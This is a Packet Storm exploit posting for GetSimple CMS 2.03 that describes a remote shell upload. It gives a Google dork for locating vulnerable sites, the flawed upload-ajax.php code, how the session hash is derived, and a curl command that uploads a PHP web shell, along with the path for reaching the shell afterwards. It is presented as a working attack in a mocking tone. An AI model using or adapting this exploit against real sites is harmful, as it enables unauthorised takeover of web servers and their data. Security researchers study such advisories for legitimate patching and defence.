GetSimple CMS 2.03 Shell Upload

2011-02-15T00:00:00
ID PACKETSTORM:98492
Type packetstorm
Reporter Chuzz
Modified 2011-02-15T00:00:00

Description

                                        
                                            `# Exploit Title: GetSimple CMS <=2.03 Remote Upload Shell (0day)  
# Google Dork: "powered by GetSimple Version 2.03"  
# Date: 15/FEB/2011  
# Author: s3rg3770 and Chuzz (irc.azzurra.org #hackerjournal)  
# Site Author: http://reflective.noblogs.org (OWL?)  
  
(\___/)  
(o\ /o)  
/|:.V.:|\  
\\::::://  
-----`"" ""`-----  
  
  
# Software Link: http://get-simple.info/  
# Version: 2.0.3  
# Tested on: *nix  
  
----------------------------------------------------------------------  
[INFO]  
  
What a Fuck? SESSIONHASH for upload a file? It's a bacon's security...  
  
Bug Code:  
getsimple/admin/upload-ajax.php  
  
if ($_REQUEST['sessionHash'] === $SESSIONHASH) {  
if (!empty($_FILES))  
{  
$tempFile = $_FILES['Filedata']['tmp_name'];  
$name = clean_img_name($_FILES['Filedata']['name']);  
$targetPath = GSDATAUPLOADPATH;  
$targetFile = str_replace(‘//’,'/’,$targetPath) . $name;  
move_uploaded_file($tempFile, $targetFile);  
----------------------------------------------------------------------  
  
Generating SESSIONHASH: md5( $salt. $sitename)  
[XPL]  
  
curl -F “Filedata=@yourshell.txt;filename=shell.php”   
http://getsimple_localhost/admin/upload-ajax.php\?sessionHash\=HASH CREATO  
  
After, enjoy your Bacon-Shell here ...http://getsimple_localhost/   
data/uploads/shell.php  
  
Thanks to my ASCELL...  
`